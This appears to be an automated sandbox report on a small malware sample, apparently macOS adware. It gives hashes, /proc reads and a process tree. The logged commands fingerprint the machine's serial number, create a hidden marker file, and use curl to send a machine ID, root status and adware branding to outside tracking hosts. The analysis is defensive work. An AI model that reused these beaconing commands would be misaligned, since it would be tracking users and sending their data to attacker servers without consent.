Analysis
max time kernel: 149s
max time network: 146s
platform: debian-9_mips
resource: debian9-mipsbe-20240729-en
resource tags: arch:mips, image:debian9-mipsbe-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 29-07-2024 07:40
Static task: static1
Behavioral task: behavioral1
  Sample: 3c6492a33885e363cae2841e0597c730_JaffaCakes118
  Resource: ubuntu1804-amd64-20240729-en
Behavioral task: behavioral2
  Sample: 3c6492a33885e363cae2841e0597c730_JaffaCakes118
  Resource: debian9-armhf-20240729-en
Behavioral task: behavioral3
  Sample: 3c6492a33885e363cae2841e0597c730_JaffaCakes118
  Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
  Sample: 3c6492a33885e363cae2841e0597c730_JaffaCakes118
  Resource: debian9-mipsel-20240729-en
General
Target: 3c6492a33885e363cae2841e0597c730_JaffaCakes118
Size: 10KB
MD5: 3c6492a33885e363cae2841e0597c730
SHA1: 99d5f88fb1a33f321aa614cfe792200bdf9eba5c
SHA256: ead1f229097555af8724321021bb8bb5421947e67cd244065dbd2990a6dcdb49
SHA512: 302bdb0ffb3be9285e7453e04d6067ca03ebdb21af5c0f26e6cb982de1c91631bffb2aab5e2f3a298a54b93337e1b510bee87e3855503a246a130bcc87ce5193
SSDEEP: 192:g0AjH8A5Zjpcjxi3LKVMyIu8bXkvLvTWM3Tk3Sw3a8na8:g1cA5t8xgNb0/mVLnP
Malware Config
Signatures
Reads runtime system information (4 IoCs)
Reads data from /proc virtual filesystem.
Processes:
  description              ioc                            process
  File opened for reading  /proc/self/maps                awk
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
  File opened for reading  /proc/filesystems              mkdir
  File opened for reading  /proc/sys/crypto/fips_enabled  curl
Processes
/tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118 (PID 696)
  command: /tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118
  /usr/bin/touch (PID 698)
    command: touch "/root/Library/Application Support/.upd2029"
  /usr/bin/openssl (PID 703)
    command: openssl md5
  /usr/bin/tr (PID 702)
    command: tr -d "\\n"
  /usr/bin/awk (PID 701)
    command: awk "-F\"" "/IOPlatformSerialNumber/{print \$(NF-1)}"
    signature: Reads runtime system information
  /usr/bin/curl (PID 708)
    command: curl -s -L "http://events.macmymacupdater.com/services/channel/?mid=(stdin)= d41d8cd98f00b204e9800998ecf8427e"
    signature: Reads runtime system information
  /bin/date (PID 713)
    command: date "+%Y%m%d%H%M%S"
  /bin/mkdir (PID 714)
    command: mkdir -p /private/tmp/.mmupdatescripts_20240729105900
    signature: Reads runtime system information
  /usr/bin/curl (PID 715)
    command: curl -s --data-urlencode "event=upd2029start" --data-urlencode "click_id=31006619970322272" --data-urlencode "c3=(stdin)= d41d8cd98f00b204e9800998ecf8427e" --data-urlencode "is_root=true" --data-urlencode "platform_version=" --data-urlencode "safari_version=" --data-urlencode "chrome_version=" --data-urlencode "r4=" --data-urlencode "domain=request.macmymacupdater.com" --data-urlencode "webtools_brand=MyCouponsmart" --data-urlencode "search_domain=www.searchmine.net" --data-urlencode "webtools_channel=upd-2029" --data-urlencode "search_channel=" "http://client.mm-bq.host/AsyncQueueWorkers/trackQueue.php?p=1"
    signature: Reads runtime system information